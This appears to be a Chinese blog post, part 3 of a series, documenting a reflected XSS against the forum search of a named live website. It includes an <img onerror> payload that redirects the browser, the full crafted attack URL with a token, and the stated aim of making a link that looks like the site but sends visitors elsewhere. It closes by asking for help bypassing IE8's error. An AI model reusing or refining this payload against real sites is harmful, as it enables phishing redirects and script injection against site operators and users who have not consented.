xss渗透试验（３）

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://cloud.tencent.com/developer/article/1344562

工具：appscan

站点：www.talk915.com

浏览器：IE８，firefox

方法：<img> onerror方法

浏览器不能够直接执行，这种通过第二次点击来实现渗透，效率非常低，最好是给出一个url，本来以为是进入talk915的，却自动跳转到另外一个网站。

应该怎么做呢？其中在本例中，我们用得最多的标签的就是<a>, <img>，我们到www.w3school.com.cn看一下它们的手册，发现<img>的onerror对象句柄没有使用。

http://www.w3school.com.cn/jsref/dom_obj_image.asp

假如，我们在

http://www.talk915.com/forum/forum_community.action

的搜索框里填入

1234"><img src=@onerror=window.location.assign("http://www.bing.com")>

结果会怎样？

因为<img>引用src的位置@，是不存在，按照手册来说，它会执行onerror这一段。也就是把浏览器地址栏输入

http://www.bing.com

用IE8,firefox来尝试，都能够跳转到bing

拼接url：

http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234%22%3e%3cimg+src%3d%40+onerror%3dwindow.location.assign(%22http%3a%2f%2fwww.bing.com%22)%3e&forumListId=4&selectForumId=1&postTitle=1234(http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234%22%3E%3Cimg+src%3D%40+onerror%3Dwindow.location.assign(%22http%3A%2F%2Fwww.bing.com%22%29%3E&forumListId=4&selectForumId=1&postTitle=1234)

但IE８仍然会报错无法跳转，firefox没问题。

希望牛人帮忙看看怎么突破IE8这个报错。谢谢。